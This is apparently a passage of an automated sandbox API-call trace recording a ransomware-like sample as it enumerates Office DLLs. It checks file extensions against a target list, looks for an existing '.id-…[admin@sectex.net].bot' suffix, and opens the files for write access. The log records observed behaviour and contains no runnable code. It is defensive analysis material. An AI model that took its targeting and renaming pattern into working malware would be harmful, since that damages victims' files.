	[0155.999] lstrlenW (lpString=".zip") returned 4
	[0155.999] lstrcmpiW (lpString1=".zip", lpString2=".ECF") returned 1
	[0155.999] lstrlenW (lpString=".rar") returned 4
	[0155.999] lstrcmpiW (lpString1=".rar", lpString2=".ECF") returned 1
	[0155.999] lstrlenW (lpString=".bz2") returned 4
	[0155.999] lstrcmpiW (lpString1=".bz2", lpString2=".ECF") returned -1
	[0155.999] lstrlenW (lpString=".7z") returned 3
	[0155.999] lstrcmpiW (lpString1=".7z", lpString2="ECF") returned -1
	[0155.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.999] lstrlenW (lpString=".dbf") returned 4
	[0155.999] lstrcmpiW (lpString1=".dbf", lpString2=".ECF") returned -1
	[0155.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.999] lstrlenW (lpString=".1cd") returned 4
	[0155.999] lstrcmpiW (lpString1=".1cd", lpString2=".ECF") returned -1
	[0155.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.999] lstrlenW (lpString=".jpg") returned 4
	[0155.999] lstrcmpiW (lpString1=".jpg", lpString2=".ECF") returned 1
	[0156.000] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0156.000] lstrlenW (lpString="UmOutlookAddin.dll") returned 18
	[0156.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\umoutlookaddin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0156.062] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1549152) returned 1
	[0156.062] CloseHandle (hObject=0x3a0) returned 1
	[0156.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\umoutlookaddin.dll")) returned 0x20
	[0156.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\umoutlookaddin.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\umoutlookaddin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.278] lstrlenW (lpString=".doc") returned 4
	[0156.278] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.278] lstrlenW (lpString=".docx") returned 5
	[0156.278] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1
	[0156.278] lstrlenW (lpString=".pdf") returned 4
	[0156.278] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.278] lstrlenW (lpString=".xls") returned 4
	[0156.278] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.278] lstrlenW (lpString=".xlsx") returned 5
	[0156.278] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1
	[0156.278] lstrlenW (lpString=".ppt") returned 4
	[0156.278] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.278] lstrlenW (lpString=".zip") returned 4
	[0156.279] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.279] lstrlenW (lpString=".rar") returned 4
	[0156.279] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.279] lstrlenW (lpString=".bz2") returned 4
	[0156.279] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.279] lstrlenW (lpString=".7z") returned 3
	[0156.279] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.279] lstrlenW (lpString=".dbf") returned 4
	[0156.279] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.279] lstrlenW (lpString=".1cd") returned 4
	[0156.279] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.279] lstrlenW (lpString=".jpg") returned 4
	[0156.279] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.279] lstrlenW (lpString=".doc") returned 4
	[0156.279] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.279] lstrlenW (lpString=".docx") returned 5
	[0156.279] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1
	[0156.279] lstrlenW (lpString=".pdf") returned 4
	[0156.279] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.279] lstrlenW (lpString=".xls") returned 4
	[0156.279] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.279] lstrlenW (lpString=".xlsx") returned 5
	[0156.279] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1
	[0156.279] lstrlenW (lpString=".ppt") returned 4
	[0156.279] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.280] lstrlenW (lpString=".zip") returned 4
	[0156.280] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.280] lstrlenW (lpString=".rar") returned 4
	[0156.280] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.280] lstrlenW (lpString=".bz2") returned 4
	[0156.280] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.280] lstrlenW (lpString=".7z") returned 3
	[0156.280] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.280] lstrlenW (lpString=".dbf") returned 4
	[0156.280] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.280] lstrlenW (lpString=".1cd") returned 4
	[0156.280] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\UmOutlookAddin.dll") returned 68
	[0156.280] lstrlenW (lpString=".jpg") returned 4
	[0156.280] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.280] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0156.280] lstrlenW (lpString="BCSProxy.dll") returned 12
	[0156.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsproxy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.281] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=137600) returned 1
	[0156.281] CloseHandle (hObject=0x38c) returned 1
	[0156.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsproxy.dll")) returned 0x20
	[0156.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcsproxy.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.287] lstrlenW (lpString=".doc") returned 4
	[0156.287] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.287] lstrlenW (lpString=".docx") returned 5
	[0156.287] lstrcmpiW (lpString1=".docx", lpString2="y.dll") returned -1
	[0156.287] lstrlenW (lpString=".pdf") returned 4
	[0156.287] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.287] lstrlenW (lpString=".xls") returned 4
	[0156.287] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.287] lstrlenW (lpString=".xlsx") returned 5
	[0156.287] lstrcmpiW (lpString1=".xlsx", lpString2="y.dll") returned -1
	[0156.287] lstrlenW (lpString=".ppt") returned 4
	[0156.287] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.287] lstrlenW (lpString=".zip") returned 4
	[0156.287] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.287] lstrlenW (lpString=".rar") returned 4
	[0156.287] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.287] lstrlenW (lpString=".bz2") returned 4
	[0156.287] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.287] lstrlenW (lpString=".7z") returned 3
	[0156.287] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.287] lstrlenW (lpString=".dbf") returned 4
	[0156.287] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.287] lstrlenW (lpString=".1cd") returned 4
	[0156.287] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.287] lstrlenW (lpString=".jpg") returned 4
	[0156.287] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.288] lstrlenW (lpString=".doc") returned 4
	[0156.288] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.288] lstrlenW (lpString=".docx") returned 5
	[0156.288] lstrcmpiW (lpString1=".docx", lpString2="y.dll") returned -1
	[0156.288] lstrlenW (lpString=".pdf") returned 4
	[0156.288] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.288] lstrlenW (lpString=".xls") returned 4
	[0156.288] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.288] lstrlenW (lpString=".xlsx") returned 5
	[0156.288] lstrcmpiW (lpString1=".xlsx", lpString2="y.dll") returned -1
	[0156.288] lstrlenW (lpString=".ppt") returned 4
	[0156.288] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.288] lstrlenW (lpString=".zip") returned 4
	[0156.288] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.288] lstrlenW (lpString=".rar") returned 4
	[0156.288] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.288] lstrlenW (lpString=".bz2") returned 4
	[0156.288] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.288] lstrlenW (lpString=".7z") returned 3
	[0156.288] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.289] lstrlenW (lpString=".dbf") returned 4
	[0156.289] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.289] lstrlenW (lpString=".1cd") returned 4
	[0156.289] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSProxy.dll") returned 55
	[0156.289] lstrlenW (lpString=".jpg") returned 4
	[0156.289] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.289] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0156.289] lstrlenW (lpString="BCSRuntime.dll") returned 14
	[0156.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsruntime.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.289] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=613760) returned 1
	[0156.290] CloseHandle (hObject=0x3e0) returned 1
	[0156.290] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsruntime.dll")) returned 0x20
	[0156.290] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcsruntime.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.290] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsruntime.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.290] lstrlenW (lpString=".doc") returned 4
	[0156.290] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.290] lstrlenW (lpString=".docx") returned 5
	[0156.290] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1
	[0156.290] lstrlenW (lpString=".pdf") returned 4
	[0156.290] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.290] lstrlenW (lpString=".xls") returned 4
	[0156.290] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.290] lstrlenW (lpString=".xlsx") returned 5
	[0156.290] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1
	[0156.290] lstrlenW (lpString=".ppt") returned 4
	[0156.290] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.290] lstrlenW (lpString=".zip") returned 4
	[0156.291] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.291] lstrlenW (lpString=".rar") returned 4
	[0156.291] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.291] lstrlenW (lpString=".bz2") returned 4
	[0156.291] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.291] lstrlenW (lpString=".7z") returned 3
	[0156.291] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.291] lstrlenW (lpString=".dbf") returned 4
	[0156.291] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.291] lstrlenW (lpString=".1cd") returned 4
	[0156.291] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.291] lstrlenW (lpString=".jpg") returned 4
	[0156.291] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.291] lstrlenW (lpString=".doc") returned 4
	[0156.291] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.291] lstrlenW (lpString=".docx") returned 5
	[0156.291] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1
	[0156.291] lstrlenW (lpString=".pdf") returned 4
	[0156.291] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.291] lstrlenW (lpString=".xls") returned 4
	[0156.291] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.291] lstrlenW (lpString=".xlsx") returned 5
	[0156.291] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1
	[0156.291] lstrlenW (lpString=".ppt") returned 4
	[0156.291] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.292] lstrlenW (lpString=".zip") returned 4
	[0156.292] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.292] lstrlenW (lpString=".rar") returned 4
	[0156.292] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.292] lstrlenW (lpString=".bz2") returned 4
	[0156.292] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.292] lstrlenW (lpString=".7z") returned 3
	[0156.292] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.292] lstrlenW (lpString=".dbf") returned 4
	[0156.292] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.292] lstrlenW (lpString=".1cd") returned 4
	[0156.292] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntime.dll") returned 57
	[0156.292] lstrlenW (lpString=".jpg") returned 4
	[0156.292] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.292] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0156.292] lstrlenW (lpString="BCSRuntimeUI.dll") returned 16
	[0156.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsruntimeui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.293] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=14208) returned 1
	[0156.293] CloseHandle (hObject=0x3e0) returned 1
	[0156.293] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsruntimeui.dll")) returned 0x20
	[0156.293] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcsruntimeui.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsruntimeui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.293] lstrlenW (lpString=".doc") returned 4
	[0156.293] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.293] lstrlenW (lpString=".docx") returned 5
	[0156.293] lstrcmpiW (lpString1=".docx", lpString2="I.dll") returned -1
	[0156.293] lstrlenW (lpString=".pdf") returned 4
	[0156.293] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.293] lstrlenW (lpString=".xls") returned 4
	[0156.294] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.294] lstrlenW (lpString=".xlsx") returned 5
	[0156.294] lstrcmpiW (lpString1=".xlsx", lpString2="I.dll") returned -1
	[0156.294] lstrlenW (lpString=".ppt") returned 4
	[0156.294] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.294] lstrlenW (lpString=".zip") returned 4
	[0156.294] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.294] lstrlenW (lpString=".rar") returned 4
	[0156.294] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.294] lstrlenW (lpString=".bz2") returned 4
	[0156.294] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.294] lstrlenW (lpString=".7z") returned 3
	[0156.294] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.294] lstrlenW (lpString=".dbf") returned 4
	[0156.294] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.294] lstrlenW (lpString=".1cd") returned 4
	[0156.294] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.294] lstrlenW (lpString=".jpg") returned 4
	[0156.294] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.294] lstrlenW (lpString=".doc") returned 4
	[0156.294] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.294] lstrlenW (lpString=".docx") returned 5
	[0156.294] lstrcmpiW (lpString1=".docx", lpString2="I.dll") returned -1
	[0156.294] lstrlenW (lpString=".pdf") returned 4
	[0156.294] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.295] lstrlenW (lpString=".xls") returned 4
	[0156.295] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.295] lstrlenW (lpString=".xlsx") returned 5
	[0156.295] lstrcmpiW (lpString1=".xlsx", lpString2="I.dll") returned -1
	[0156.295] lstrlenW (lpString=".ppt") returned 4
	[0156.295] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.295] lstrlenW (lpString=".zip") returned 4
	[0156.295] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.295] lstrlenW (lpString=".rar") returned 4
	[0156.295] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.295] lstrlenW (lpString=".bz2") returned 4
	[0156.295] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.295] lstrlenW (lpString=".7z") returned 3
	[0156.295] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.295] lstrlenW (lpString=".dbf") returned 4
	[0156.295] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.295] lstrlenW (lpString=".1cd") returned 4
	[0156.295] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSRuntimeUI.dll") returned 59
	[0156.295] lstrlenW (lpString=".jpg") returned 4
	[0156.295] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0156.295] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0156.295] lstrlenW (lpString="BCSStr32.dll") returned 12
	[0156.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsstr32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.296] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=167808) returned 1
	[0156.296] CloseHandle (hObject=0x3e0) returned 1
	[0156.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsstr32.dll")) returned 0x20
	[0156.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcsstr32.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsstr32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSStr32.dll") returned 55
	[0156.297] lstrlenW (lpString=".doc") returned 4
	[0156.297] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.297] lstrlenW (lpString=".docx") returned 5
	[0156.297] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1
	[0156.297] lstrlenW (lpString=".pdf") returned 4
	[0156.297] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.297] lstrlenW (lpString=".xls") returned 4
	[0156.297] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
